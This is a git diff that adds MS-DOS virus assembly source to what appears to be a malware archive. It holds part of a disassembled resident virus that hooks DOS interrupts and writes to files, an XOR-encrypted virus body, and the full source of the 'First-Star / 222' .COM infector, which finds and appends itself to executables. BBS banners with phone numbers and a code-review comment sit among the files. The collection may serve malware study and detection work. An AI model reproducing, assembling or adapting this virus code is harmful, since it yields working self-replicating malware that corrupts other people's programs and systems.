word ptr data_22+2,es ; (8344:08B5=8344h) + mov ah,25h ; '%' + lds dx,data_21 ; (8344:08AF=0) Load 32 bit ptr + int 21h ; DOS Services ah=function 25h + ; set intrpt vector al to ds:dx + mov al,40h ; '@' +;* mov dx,offset loc_85 ;* + db 0BAh, 59h,0ECh + mov bx,0F000h + mov ds,bx + int 21h ; DOS Services ah=function 25h + ; set intrpt vector al to ds:dx + pop es + pop ds + pop bx + xor cx,cx ; Zero register + xor dx,dx ; Zero register + call sub_21 ; (0870) + mov cx,7ABh + mov si,904h + call sub_7 ; (0758) + jnz loc_66 ; Jump if not zero + add cx,6 + mov ax,data_46 ; (8344:08F0=0) + mov ds:data_54e,ax ; (8344:10AF=0) + mov ax,data_48 ; (8344:08FE=0) + mov ds:data_55e,ax ; (8344:10B1=0) + mov ax,ds:data_49e ; (8344:0900=0) + mov ds:data_56e,ax ; (8344:10B3=0) +loc_66: + push si + call sub_10 ; (0778) + mov [si],dx + pop dx + inc cx + inc cx + call sub_9 ; (076E) + jc loc_68 ; Jump if carry Set + pop dx + pop cx + call sub_20 ; (086B) + mov dx,100h + mov cx,7ABh + call sub_9 ; (076E) + jc loc_69 ; Jump if carry Set + call sub_7 ; (0758) + jnz loc_67 ; Jump if not zero + xor cx,cx ; Zero register + mov data_46,cx ; (8344:08F0=0) + mov data_48,dx ; (8344:08FE=0) + mov word ptr ds:data_49e,0FFF0h ; (8344:0900=0) + xor dx,dx ; Zero register + call sub_20 ; (086B) + mov dx,8EAh + mov cx,1Ah + call sub_9 ; (076E) + jc loc_69 ; Jump if carry Set +loc_67: + cmp al,al + jmp short loc_70 ; (073C) +loc_68: + mov al,1 + cmp al,0 + jmp short loc_70 ; (073C) +loc_69: + stc ; Set carry flag +loc_70: + pushf ; Push flags + mov ah,0Dh + int 21h ; DOS Services ah=function 0Dh + ; flush disk buffers to disk + push ds + mov ax,2513h + lds dx,dword ptr data_22 ; (8344:08B3=0) Load 32 bit ptr + int 21h ; DOS Services ah=function 25h + ; set intrpt vector al to ds:dx + mov al,40h ; '@' + lds dx,dword ptr cs:data_30 ; (8344:08C3=0) Load 32 bit ptr + int 21h ; DOS Services ah=function 25h + ; set intrpt vector al to ds:dx + pop ds + jmp loc_64 ; (0662) +sub_5 endp + + +; +; SUBROUTINE +; + 
+sub_7 proc near + mov ax,data_45 ; (8344:08EA=0) + cmp ax,5A4Dh + je loc_ret_71 ; Jump if equal + cmp ax,4D5Ah + +loc_ret_71: + retn +sub_7 endp + + +; +; SUBROUTINE +; + +sub_8 proc near + mov ah,3Fh ; '?' + call sub_23 ; (0879) + jc loc_ret_72 ; Jump if carry Set + cmp ax,cx + +loc_ret_72: + retn +sub_8 endp + + +; +; SUBROUTINE +; + +sub_9 proc near + mov ah,40h ; '@' + call sub_23 ; (0879) + jc loc_ret_73 ; Jump if carry Set + cmp ax,cx + +loc_ret_73: + retn +sub_9 endp + + +; +; SUBROUTINE +; + +sub_10 proc near + push cx + xor dx,dx ; Zero register + +locloop_74: + lodsb ; String [si] to al + add dl,al + adc dh,0 + loop locloop_74 ; Loop if cx > 0 + + pop cx + retn +sub_10 endp + + +; +; SUBROUTINE +; + +sub_11 proc near + push cs + pop ds + mov si,904h + mov bx,ax + mov cx,7ABh + call sub_7 ; (0758) + jnz loc_75 ; Jump if not zero + mov ax,data_47 ; (8344:08F2=0) + mov dx,10h + mul dx ; dx:ax = reg * ax + push bx + push di + call sub_12 ; (07BF) + pop di + pop bx + mov si,offset data_45 ; (8344:08EA=0) + mov cx,1Ah + mov ax,ds:data_54e ; (8344:10AF=0) + mov data_46,ax ; (8344:08F0=0) + mov ax,ds:data_55e ; (8344:10B1=0) + mov data_48,ax ; (8344:08FE=0) + mov ax,ds:data_56e ; (8344:10B3=0) + mov ds:data_49e,ax ; (8344:0900=0) +loc_75: + xor ax,ax ; Zero register + xor dx,dx ; Zero register + +; External Entry into Subroutine + +sub_12: + sub ax,data_37 ; (8344:08D0=0) + sbb dx,data_38 ; (8344:08D2=0) + jc loc_76 ; Jump if carry Set + jnz loc_ret_79 ; Jump if not zero + sub bx,ax + jbe loc_ret_79 ; Jump if below or = + add di,ax + jmp short loc_77 ; (07E2) +loc_76: + neg ax + adc dx,0 + neg dx + jnz loc_ret_79 ; Jump if not zero + sub cx,ax + jbe loc_ret_79 ; Jump if below or = + add si,ax +loc_77: + cmp cx,bx + jbe loc_78 ; Jump if below or = + mov cx,bx +loc_78: + cld ; Clear direction + rep movsb ; Rep when cx >0 Mov [si] to es:[di] + +loc_ret_79: + retn +sub_11 endp + + +; +; SUBROUTINE +; + +sub_13 proc near + pushf ; Push flags + call sub_24 ; (0884) + 
mov ah,49h ; 'I' + push ds + pop es + int 21h ; DOS Services ah=function 49h + ; release memory block, es=seg + mov ah,49h ; 'I' + mov es,ds:data_8e ; (0046:002C=50h) + int 21h ; DOS Services ah=function 49h + ; release memory block, es=seg + mov ah,50h ; 'P' + mov bx,ds:data_7e ; (0046:0016=0) + int 21h ; DOS Services ah=function 50h + ; set active PSP segmnt from bx + mov ax,2522h + lds dx,dword ptr ds:data_6e ; (0046:000A=0) Load 32 bit ptr + int 21h ; DOS Services ah=function 25h + ; set intrpt vector al to ds:dx + call sub_25 ; (0896) + popf ; Pop flags + retn +sub_13 endp + + +; +; SUBROUTINE +; + +sub_14 proc near + mov si,dx + cmp byte ptr [si],0FFh + jne loc_ret_80 ; Jump if not equal + add si,7 + +loc_ret_80: + retn +sub_14 endp + + +; +; SUBROUTINE +; + +sub_15 proc near + call sub_24 ; (0884) + call sub_14 ; (0814) + push cs + pop es + mov dx,904h + mov di,dx + cld ; Clear direction + lodsb ; String [si] to al + or al,al ; Zero ? + jz loc_81 ; Jump if zero + add al,40h ; '@' + mov ah,3Ah ; ':' + stosw ; Store ax to es:[di] +loc_81: + movsw ; Mov [si] to es:[di] + movsw ; Mov [si] to es:[di] + movsw ; Mov [si] to es:[di] + movsw ; Mov [si] to es:[di] + mov al,2Eh ; '.' 
+ stosb ; Store al to es:[di] + movsw ; Mov [si] to es:[di] + movsb ; Mov [si] to es:[di] + xor al,al ; Zero register + stosb ; Store al to es:[di] + push es + pop ds + call sub_3 ; (0519) + call sub_25 ; (0896) + retn +sub_15 endp + + +; +; SUBROUTINE +; + +sub_16 proc near + push ax + mov ax,cs + jmp short loc_82 ; (0854) + +; External Entry into Subroutine + +sub_17: + push ax + xor ax,ax ; Zero register +loc_82: + push bx + push ds + mov bx,cs + dec bx + mov ds,bx + mov ds:data_16e,ax ; (8343:0001=0FFFFh) + pop ds + pop bx + pop ax + retn +sub_16 endp + + +; +; SUBROUTINE +; + +sub_18 proc near + mov ax,3D00h + jmp short loc_83 ; (0879) + +; External Entry into Subroutine + +sub_19: + mov ah,3Eh ; '>' + jmp short loc_83 ; (0879) + +; External Entry into Subroutine + +sub_20: + mov ax,4200h + jmp short loc_83 ; (0879) + +; External Entry into Subroutine + +sub_21: + mov ax,4202h + jmp short loc_83 ; (0879) + +; External Entry into Subroutine + +sub_22: + push word ptr [bp+6] + popf ; Pop flags + +; External Entry into Subroutine + +sub_23: +loc_83: + pushf ; Push flags + cli ; Disable interrupts + call dword ptr cs:data_20 ; (8344:08AB=0) + retn +sub_18 endp + + +; +; +; External Entry Point +; +; + +int_24h_entry proc far + mov al,3 +int_24h_entry endp + + +; +; +; External Entry Point +; +; + +int_23h_entry proc far + iret ; Interrupt return +int_23h_entry endp + + +; +; SUBROUTINE +; + +sub_24 proc near + pop cs:data_32 ; (8344:08C7=0) + push ds + push dx + push es + push bx + push ax + push cx + push si + push di + push bp + mov bp,sp + jmp short loc_84 ; (08A6) + +; External Entry into Subroutine + +sub_25: + pop cs:data_32 ; (8344:08C7=0) + mov sp,bp + pop bp + pop di + pop si + pop cx + pop ax + pop bx + pop es + pop dx + pop ds +loc_84: + jmp word ptr cs:data_32 ; (8344:08C7=0) +data_20 dd 00000h +data_21 dd 00000h +data_22 dw 0, 8344h +data_24 dw 0, 8344h +data_26 dw 0, 8344h +data_28 dw 0, 8344h +data_30 dw 0, 8344h +data_32 dw 0 +data_33 db 0 +data_34 
dw 0 +data_35 dw 0 +data_36 dw 0 +data_37 dw 0 +data_38 dw 0 +data_39 dw 0 + db 12 dup (0) +data_41 dw 0 +data_42 dw 0 +data_43 dd 00000h +data_45 dw 0 + db 0, 0, 0, 0 +data_46 dw 0 +data_47 dw 0 + db 10 dup (0) +data_48 dw 0 +sub_24 endp + + +seg_a ends + + + + end start + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.1992.asm b/MSDOS/Virus.MSDOS.Unknown.1992.asm new file mode 100644 index 00000000..f2afc514 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.1992.asm 
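Review bot: Several instruction ranges in this hunk are left as raw `db` byte lists with no comment saying why, notably the block that follows the `iret` after `loc_11` (`db 55h, 8Bh,0ECh, 80h,0FCh, 48h` …) and the `db 0BAh, 59h,0ECh` that stands in for the commented-out `mov dx,offset loc_85`. Since this is kept as a reference disassembly, each such block should carry a note like `; not decoded by the disassembler - verify against the binary before relying on this range` so an analyst knows the mnemonics around it are not a complete decode. The `8344h` segment values baked into the `data_22` … `data_30` initialisers and the `(8344:xxxx=…)` annotations are load-address artefacts of the disassembly session rather than part of the sample, which the header should say explicitly; the BBS phone number in that header is personal contact data that an archived copy does not need. A one-paragraph summary of what the listing shows (the original INT 21h vector saved in `data_20` and reached through `sub_23`, the `MZ`/`ZM` signature test in `sub_7`, and the INT 13h/40h vector swaps around the file writes) would make the file usable for detection work without a full read-through.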
@@ -0,0 +1,925 @@ + PAGE ,132 +S00000 SEGMENT BYTE PUBLIC 'code' + ASSUME CS:S00000 + ASSUME SS:S00000 + ASSUME DS:S00000 +H00000 DB 256 DUP(?) +P00100 PROC FAR + ASSUME ES:S00000 +H00100: + JMP SHORT H00104 + DB 90H +H00103 DB 2 +H00104: + CALL P0010A + JMP H006F1 +P0010A PROC NEAR +H0010A: + PUSH CX + MOV BX,0138H +H0010E: + MOV CH,[BX] + XOR CH,H00103 + MOV [BX],CH + INC BX + CMP BX,0900H + JLE H0010E + POP CX + RET +P0010A ENDP + DW 00BAH + DW 8B01H + DW 0E51EH + DW 5306H + DW 0E0E8H + DW 5BFFH + DW 0C8B9H + DW 0B407H + DW 0CD40H + DW 5321H + DW 0D4E8H + DW 5BFFH + DW 0DC3H + DW 1B10H + DW 0800H + DW 1BB1H + DW 0C104H + DW 2218H + DW 0BDC6H + DW 011BH + DW 1BB1H + DW 0B115H + DW 011BH + DW 1B1AH + DW 0C100H + DW 0418H + DW 0DBC6H + DW 0B302H + DW 14B3H + DW 1918H + DW 10B3H + DW 22DFH + DW 0822H + DW 1BB1H + DW 0C101H + DW 0C18H + DW 0C0C6H + DW 0518H + DW 0C3C6H + DW 0BDC6H + DW 2222H + DW 1B1AH + DW 0B100H + DW 061BH + DW 0B302H + DW 14B3H + DW 1D18H + DW 10B3H + DW 22DFH + DW 0C208H + DW 0C6C6H + DW 0C6C0H + DW 1BDBH + DW 0B10CH + DW 0B1BH + DW 22B1H + DW 1A22H + DW 001BH + DW 1BB1H + DW 0201H + DW 0B3B3H + DW 1814H + DW 0B323H + DW 0DF10H + DW 001BH + DW 0B108H + DW 121BH + DW 1BB1H + DW 0C20BH + DW 0C6C6H + DW 1B1AH + DW 0B100H + DW 001BH + DW 0B302H + DW 14B3H + DW 2118H + DW 10B3H + DW 22DFH + DW 1B13H + DW 0B06H + DW 10DCH + DW 1322H + DW 0DC22H + DW 2210H + DW 2213H + DW 10DCH + DW 1322H + DW 0DC22H + DW 2210H + DW 1B13H + DW 0DC06H + DW 2210H + DW 2213H + DW 0DC22H + DW 2210H + DW 1322H + DW 2222H + DW 10DCH + DW 2222H + DW 1B1AH + DW 0800H + DW 22B1H + DW 0222H + DW 0B3B3H + DW 1814H + DW 0B30AH + DW 180DH + DW 0B31AH + DW 1002H + DW 14DFH + DW 0B3B3H + DW 10B3H + DW 13DFH + DW 0B22H + DW 02DCH + DW 1810H + DW 0B306H + DW 2213H + DW 0DC0BH + DW 0DC22H + DW 1002H + DW 0B3B3H + DW 2213H + DW 0DC0BH + DW 1002H + DW 13B3H + DW 0B22H + DW 02DCH + DW 1810H + DW 0B306H + DW 2213H + DW 0DC0BH + DW 0DC22H + DW 0DC22H + DW 0DC22H + DW 1002H + DW 22B3H + DW 
1B1AH + DW 0800H + DW 22B1H + DW 0222H + DW 0B3B3H + DW 1814H + DW 0B305H + DW 180DH + DW 0B31BH + DW 1002H + DW 22DFH + DW 1422H + DW 10B3H + DW 13DFH + DW 061BH + DW 0DC0BH + DW 2210H + DW 2213H + DW 0DC22H + DW 1002H + DW 22B3H + DW 1322H + DW 0B22H + DW 02DCH + DW 0B310H + DW 1B13H + DW 0B06H + DW 10DCH + DW 1322H + DW 0DC22H + DW 1002H + DW 13B3H + DW 0B22H + DW 02DCH + DW 0B310H + DW 2213H + DW 0DC0BH + DW 1002H + DW 22B3H + DW 081AH + DW 0C6C6H + DW 0DBC0H + DW 2222H + DW 0B302H + DW 14B3H + DW 0518H + DW 0DB3H + DW 0E18H + DW 12B3H + DW 051BH + DW 1814H + DW 0B301H + DW 1002H + DW 1BDFH + DW 0800H + DW 22B1H + DW 0222H + DW 0B3B3H + DW 13B3H + DW 0B22H + DW 02DCH + DW 0B310H + DW 2213H + DW 0DC0BH + DW 0DC22H + DW 1002H + DW 22B3H + DW 2213H + DW 0DC0BH + DW 1002H + DW 22B3H + DW 0B3B3H + DW 13B3H + DW 0B22H + DW 02DCH + DW 0B310H + DW 2213H + DW 0DC0BH + DW 1002H + DW 22B3H + DW 0B3B3H + DW 2213H + DW 0DC0BH + DW 1002H + DW 22B3H + DW 221AH + DW 0822H + DW 1BB1H + DW 0200H + DW 0B3B3H + DW 1814H + DW 0B305H + DW 180DH + DW 0B30EH + DW 0DC12H + DW 0D9D9H + DW 1402H + DW 0B3B3H + DW 0B0B0H + DW 120DH + DW 14D9H + DW 0B3B3H + DW 02B3H + DW 0DF10H + DW 011BH + DW 0B108H + DW 1322H + DW 061BH + DW 0DC0BH + DW 1002H + DW 13B3H + DW 0B22H + DW 02DCH + DW 0B310H + DW 2213H + DW 0DC0BH + DW 1002H + DW 13B3H + DW 0B22H + DW 02DCH + DW 0B310H + DW 1B13H + DW 0B06H + DW 02DCH + DW 0B310H + DW 2213H + DW 0DC0BH + DW 1002H + DW 1BB3H + DW 1300H + DW 0B22H + DW 02DCH + DW 0B310H + DW 1A22H + DW 2222H + DW 0B108H + DW 001BH + DW 0B302H + DW 14B3H + DW 0518H + DW 0DB3H + DW 0E18H + DW 12B3H + DW 0D9DCH + DW 02D9H + DW 0B314H + DW 0B3B3H + DW 0DB0H + DW 0D912H + DW 0B314H + DW 02B3H + DW 0DF10H + DW 061BH + DW 0B108H + DW 2222H + DW 1802H + DW 0B307H + DW 0B322H + DW 22B3H + DW 0B3B3H + DW 0B322H + DW 22B3H + DW 0718H + DW 22B3H + DW 0B3B3H + DW 001BH + DW 0B3B3H + DW 22B3H + DW 221AH + DW 0822H + DW 1BB1H + DW 0200H + DW 0B3B3H + DW 1814H + DW 0B301H + DW 0B30DH + DW 
0B3B3H + DW 0B302H + DW 180DH + DW 0B30EH + DW 0DC12H + DW 0718H + DW 14D9H + DW 0B3B3H + DW 1002H + DW 1BDFH + DW 0801H + DW 0C6D8H + DW 1BDBH + DW 0D818H + DW 0C6C6H + DW 0BDC6H + DW 2222H + DW 221AH + DW 0B122H + DW 011BH + DW 0B302H + DW 14B3H + DW 0B3B3H + DW 0DB3H + DW 1818H + DW 02B3H + DW 0DF10H + DW 001BH + DW 0C108H + DW 0418H + DW 0C0C6H + DW 1618H + DW 0DBC6H + DW 001BH + DW 22B1H + DW 1A22H + DW 2222H + DW 18C1H + DW 0C601H + DW 02BDH + DW 0B3B3H + DW 140DH + DW 1F18H + DW 02B3H + DW 0DF10H + DW 2222H + DW 0B108H + DW 071BH + DW 2216H + DW 140DH + DW 1656H + DB 'jg"ocl"ujm"`pmwejv"{mw"' + DW 2210H + DW 0822H + DW 22B1H + DW 1A22H + DW 2222H + DW 1BB1H + DW 0B101H + DW 0B302H + DW 0DB3H + DW 1814H + DW 0B31EH + DW 1002H + DW 1BDFH + DW 0800H + DW 1BB1H + DW 0201H + DW 0B3B3H + DW 2216H + DB 0DH + DB '400."Qikqo"Mlg."Acrvkcl"' + DW 2210H + DW 0822H + DW 22B1H + DW 1A22H + DW 2222H + DW 1BB1H + DW 0B101H + DW 0B302H + DW 0DB3H + DW 1814H + DW 0B310H + DW 1002H + DW 0DDFH + DW 1814H + DW 0B305H + DW 1002H + DW 1BDFH + DW 0801H + DW 1BB1H + DW 0201H + DW 0B3B3H + DW 2216H + DB 0DH + DB 'Vpkrq."clf"Qw`/Xgpm"lmu"' + DW 2210H + DW 0822H + DW 22B1H + DW 1A22H + DW 2222H + DW 1BB1H + DW 0B101H + DW 0B302H + DW 0DB3H + DW 1814H + DW 0B310H + DW 1002H + DW 1BDFH + DW 0801H + DW 1BB1H + DW 0B105H + DW 011BH + DW 0B302H + DW 16B3H + DW 0D22H + DB 'qjcliq"{mw"ceckl.""ukvj"' + DW 2210H + DW 0822H + DW 0C6C2H + DW 1AC6H + DW 2222H + DW 1BB1H + DW 0B101H + DW 0B302H + DW 0DB3H + DW 1814H + DW 0B310H + DW 1002H + DW 1BDFH + DW 0801H + DW 0C6C2H + DW 0BDC6H + DW 061BH + DW 0C6C1H + DW 22BDH + DW 0222H + DW 0B3B3H + DW 2216H + DB 0DH + DB 'jkq"ncvgqv,,,' + DW 081BH + DW 1B10H + DW 1A06H + DW 2222H + DW 0C208H + DW 0C6C6H + DW 0C6C0H + DW 02C3H + DW 0B3B3H + DW 140DH + DW 1118H + DW 02B3H + DW 0DF10H + DW 071BH + DW 0B108H + DW 061BH + DW 22B1H + DW 22B1H + DW 0222H + DW 1A18H + DW 1BB3H + DW 1A04H + DW 061BH + DW 0B108H + DW 2222H + DW 0B302H + DW 0DB3H + DW 1814H + DW 
0B315H + DW 1002H + DW 22DFH + DW 0822H + DW 1BB1H + DW 0B106H + DW 0C222H + DW 1E18H + DW 0BDC6H + DW 011BH + DW 0C61AH + DW 0C0C6H + DW 0C6C6H + DW 22DBH + DW 0222H + DW 0B3B3H + DW 140DH + DW 1418H + DW 02B3H + DW 0DF10H + DW 001BH + DW 0C108H + DW 0C6C6H + DW 0C0C6H + DW 0DBC6H + DW 071BH + DW 2217H + DB 0CH + DB 'Qikqo"3;;0"/"Tkpwq' + DW 0118H + DW 2223H + DW 2210H + DW 0C108H + DW 0118H + DW 1AC6H + DW 2222H + DW 1BB1H + DW 0206H + DW 0B3B3H + DW 140DH + DW 0A18H + DW 02B3H + DW 0DF10H + DW 0A1BH + DW 0D808H + DW 0418H + DW 0DBC6H + DW 001BH + DW 1BB1H + DW 0207H + DW 0B3B3H + DW 1B17H + DW 0D01H + DB 'Egv"c"ncvg"rcqq#' + DW 011BH + DW 2210H + DW 0B108H + DW 011BH + DW 0D81AH + DW 0DBC6H + DW 001BH + DW 0B302H + DW 0DB3H + DW 1811H + DW 0D909H + DW 0D914H + DW 12D9H + DW 10DFH + DW 071BH + DW 0B108H + DW 081BH + DW 1BB1H + DW 0207H + DW 1A18H + DW 22B3H + DW 0822H + DW 1BB1H + DW 1A01H + DW 22B1H + DW 0B302H + DW 0DB3H + DW 1811H + DW 0D919H + DW 1002H + DW 1BDFH + DW 0805H + DW 1BB1H + DW 0D811H + DW 0918H + DW 0DBC6H + DW 011BH + DW 021AH + DW 0B3B3H + DW 120DH + DW 2218H + DW 0DFD9H + DW 1B10H + DW 0806H + DW 1BB1H + DW 0B111H + DW 121BH + DW 0D1AH + DW 1812H + DW 0D921H + DW 10DFH + DW 011BH + DW 0C208H + DW 1118H + DW 0DBC6H + DW 121BH + DW 281AH + DB 2 + DB '(,GZG' + DW 5E02H + DW 0102H + DB '========"""' + DW 0111H + DW 0202H + DW 2802H + DW 0EFD3H + DW 1348H + DW 7B68H + DW 14D4H + DW 0202H + DW 0202H + DB 'FMQ' + DB 2 + DB '""""' + DW 0202H + DW 0202H + DW 0102H + DB '========GZG' + DW 0705H + DW 2302H + DW 2802H + DW 0EFD3H + DB 'H"*' + DW 2300H + DW 0002H + DW 0202H + DB 2 + DB 'VCPEGP,GZG' + DW 0202H + DW 9502H + DW 4432H + DW 7304H + DW 9504H + DW 0232H + DB 'VGOR' + DW 0202H + DW 0202H + DW 0202H + DW 0202H + DW 0202H + DW 0202H + DW 0202H + DW 0202H + DW 0202H + DW 0202H + DW 0202H + DW 0202H + DW 0202H + DW 0202H + DW 0202H + DW 0202H + DW 0202H + DW 0202H + DW 0202H + DW 0202H + DW 0202H + DW 0202H + DW 0202H + DW 0202H + DW 0202H + DW 0202H 
+ DW 0202H + DW 0202H + DW 0202H + DW 0202H + DW 0207H + DW 002AH + DW 0223H + DW 0222H + DW 22CFH + DW 0202H +H006F1: + MOV DX,3202H + IRET +P00100 ENDP + DW 3E23H + DW 7001H + DW 0B629H + DW 0CF2EH + DW 8A23H + DW 0114H + DW 0B603H + DW 0CF28H + DW 8223H + DW 1BF8H + DW 067EH + DW 073EH + DW 0176H + DW 77E9H + DW 0BC92H + DW 033AH + DW 02BAH + DW 8CBAH + DW 0BDC2H + DW 0202H + DW 06BBH + DW 0EA07H + DW 0207H + DW 0FCE9H + DW 88EBH + DW 0E102H + DW 8959H + DW 31D5H + DW 0FEC2H + DB 0AEH + DB '>"p' + DW 0A907H + DW 0FAE0H + DW 4EE9H + DW 123EH + DW 0571H + DW 0E682H + DW 08F2H + DW 0E9E2H + DW 3EF3H + DW 761AH + DW 7111H + DW 2E1BH + DW 0012H + DW 00C2H + DW 00C2H + DW 00C2H + DW 82C2H + DW 8DE6H + DW 0E208H + DW 0D8E9H + DW 0C083H + DW 02A2H + DW 0F889H + DW 0D0E9H + DW 193EH + DW 0570H + DW 0CE77H + DW 0F682H + DW 0E982H + DW 3EC5H + DW 891BH + DW 0AEDBH + DW 0CA88H + DW 22B2H + DW 0076H + DW 49AEH + DW 0EF30H + DW 0F143H + DW 89A9H + DW 4BC9H + DW 0A8E2H + DW 0B8C1H + DW 0444H + DW 18B6H + DW 23CFH + DW 1BB6H + DW 23CFH + DW 0D288H + DW 0C0FCH + DW 45B6H + DW 0A7BCH + DW 0CF04H + DW 0B823H + DW 0446H + DW 39B6H + DW 23CFH + DW 11BBH + DW 0B802H + DW 043EH + DW 4CB6H + DW 23CFH + DW 103FH + DW 7702H + DW 0E901H + DW 9253H + DW 4DB6H + DW 23CFH + DW 103FH + DW 7602H + DW 0B845H + DW 0466H + DW 39B6H + DW 23CFH + DW 2DB6H + DW 23CFH + DW 048EH + DW 049EH + DW 1C8BH + DW 049CH + DW 73B8H + DW 0B604H + DW 0CF18H + DW 0BB23H + DW 0205H + DW 3CB8H + DW 0B604H + DW 0CF4CH + DW 3F23H + DW 0210H + DW 2377H + DW 4DB6H + DW 23CFH + DW 103FH + DW 7702H + DW 0B81AH + DW 0446H + DW 39B6H + DW 23CFH + DW 18B6H + DW 1C8CH + DW 049EH + DW 1489H + DW 049CH + DW 23CFH + DW 0B2E9H + DW 7BE9H + DW 0B692H + DW 0CF2DH + DW 8E23H + DW 0A004H + DW 8B04H + DW 0A21CH + DW 0B804H + DW 048DH + DW 73B9H + DW 8904H + DW 1A45H + DW 0EBA1H + DW 8904H + DW 1445H + DW 0E5A1H + DW 8904H + DW 1745H + DW 02BAH + DW 0CF41H + DW 8B23H + DW 0E90CH + DW 0BA04H + DW 4103H + DW 0CB31H + DW 23CFH + DW 02BAH 
+ DW 0CF3FH + DB '#p!' + DW 0E7A1H + DW 0B604H + DW 893DH + DW 0E71CH + DW 0BB04H + DW 0200H + DW 0EFB8H + DW 0CF04H + DW 0B623H + DW 893CH + DW 0E71CH + DW 0CF04H + DW 8923H + DW 0EF1CH + DW 8304H + DW 0E9F9H + DW 7700H + DW 0B60DH + DW 8C18H + DW 0A01CH + DW 8904H + DW 0A214H + DW 0CF04H + DW 0EB23H + DW 0FD77H + DW 8DB8H + DW 0BA04H + DW 3F00H + DW 23CFH + DW 0E7A1H + DW 0EA04H + DW 0FA9DH + DW 03BAH + DW 8955H + DW 0E71CH + DW 8904H + DW 0E50CH + DW 8904H + DW 0EB14H + DW 0CF04H + DW 0BA23H + DW 4103H + DW 0C89H + DW 04E9H + DW 8DB8H + DW 0CF04H + DW 0B623H + DW 0B839H + DW 0446H + DW 23CFH + DW 39B6H + DW 0A7B8H + DW 0CF04H + DW 0BA23H + DW 4E02H + DB 0CFH + DB '#OaCdgg"upmvg"Ujcng######' +S00000 ENDS + END P00100 + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.1st_star.asm b/MSDOS/Virus.MSDOS.Unknown.1st_star.asm new file mode 100644 index 00000000..352b021d --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.1st_star.asm 
@@ -0,0 +1,161 @@ +;****************************************************************************; +; ; +; -=][][][][][][][][][][][][][][][=- ; +; -=] P E R F E C T C R I M E [=- ; +; -=] +31.(o)79.426o79 [=- ; +; -=] [=- ; +; -=] For All Your H/P/A/V Files [=- ; +; -=] SysOp: Peter Venkman [=- ; +; -=] [=- ; +; -=] +31.(o)79.426o79 [=- ; +; -=] P E R F E C T C R I M E [=- ; +; -=][][][][][][][][][][][][][][][=- ; +; ; +; *** NOT FOR GENERAL DISTRIBUTION *** ; +; ; +; This File is for the Purpose of Virus Study Only! It Should not be Passed ; +; Around Among the General Public. It Will be Very Useful for Learning how ; +; Viruses Work and Propagate. But Anybody With Access to an Assembler can ; +; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ; +; Experience can Turn it Into a far More Malevolent Program Than it Already ; +; Is. Keep This Code in Responsible Hands! ; +; ; +;****************************************************************************; +; +; First-Star / 222 Virus +; +; (C) by Glenn Benton in 1992 +; This is a non-resident direct action .COM infector in current dirs. 
+; +; +; + Org 0h + +Start: Jmp MainVir + Db '*' + +MainVir: Call On1 +On1: Pop BP + Sub BP,Offset MainVir+3 + Push Ax + Mov Ax,Cs:OrgPrg[BP] + Mov Bx,Cs:OrgPrg[BP]+2 + Mov Cs:Start+100h,Ax + Mov Cs:Start[2]+100h,Bx + Mov Ah,1ah + Mov Dx,0fd00h + Int 21h + Mov Ah,4eh +Search: Lea Dx,FileSpec[BP] + Xor Cx,Cx + Int 21h + Jnc Found + Jmp Ready +Found: Mov Ax,4300h + Mov Dx,0fd1eh + Int 21h + Push Cx + Mov Ax,4301h + Xor Cx,Cx + Int 21h + Mov Ax,3d02h + Int 21h + Mov Bx,5700h + Xchg Ax,Bx + Int 21h + Push Cx + Push Dx + Mov Ah,3fh + Lea Dx,OrgPrg[BP] + Mov Cx,4 + Int 21h + Mov Ax,Cs:[OrgPrg][BP] + Cmp Ax,'MZ' + Je ExeFile + Cmp Ax,'ZM' + Je ExeFile + Mov Ah,Cs:[OrgPrg+3][BP] + Cmp Ah,'*' + Jne Infect +ExeFile: Call Close + Mov Ah,4fh + Jmp Search +FSeek: Xor Cx,Cx + Xor Dx,Dx + Int 21h + Ret +Infect: Mov Ax,4202h + Call FSeek + Sub Ax,3 + Mov Cs:CallPtr[BP]+1,Ax + Mov Ah,40h + Lea Dx,MainVir[BP] + Mov Cx,VirLen + Int 21h + Mov Ax,4200h + Call FSeek + Mov Ah,40h + Lea Dx,CallPtr[BP] + Mov Cx,4 + Int 21h + Call Close +Ready: Mov Ah,1ah + Mov Dx,80h + Int 21h + Pop Ax + Mov Bx,100h + Push Cs + Push Bx + Retf +Close: Pop Si + Pop Dx + Pop Cx + Mov Ax,5701h + Int 21h + Mov Ah,3eh + Int 21h + Mov Ax,4301h + Pop Cx + Mov Dx,0fd1eh + Int 21h + Push Si + Ret + +CallPtr Db 0e9h,0,0 +FileSpec Db '*.COM',0 + +OrgPrg: Int 20h + Nop + Nop + +VirLen Equ $-MainVir + +;****************************************************************************; +; ; +; -=][][][][][][][][][][][][][][][=- ; +; -=] P E R F E C T C R I M E [=- ; +; -=] +31.(o)79.426o79 [=- ; +; -=] [=- ; +; -=] For All Your H/P/A/V Files [=- ; +; -=] SysOp: Peter Venkman [=- ; +; -=] [=- ; +; -=] +31.(o)79.426o79 [=- ; +; -=] P E R F E C T C R I M E [=- ; +; -=][][][][][][][][][][][][][][][=- ; +; ; +; *** NOT FOR GENERAL DISTRIBUTION *** ; +; ; +; This File is for the Purpose of Virus Study Only! It Should not be Passed ; +; Around Among the General Public. 
It Will be Very Useful for Learning how ; +; Viruses Work and Propagate. But Anybody With Access to an Assembler can ; +; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ; +; Experience can Turn it Into a far More Malevolent Program Than it Already ; +; Is. Keep This Code in Responsible Hands! ; +; ; +;****************************************************************************; + +;; +;> and Remember Don't Forget to Call <; +;> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <; +;; + diff --git a/MSDOS/Virus.MSDOS.Unknown.1stvirus.asm b/MSDOS/Virus.MSDOS.Unknown.1stvirus.asm new file mode 100644 index 00000000..32e5930b --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.1stvirus.asm 
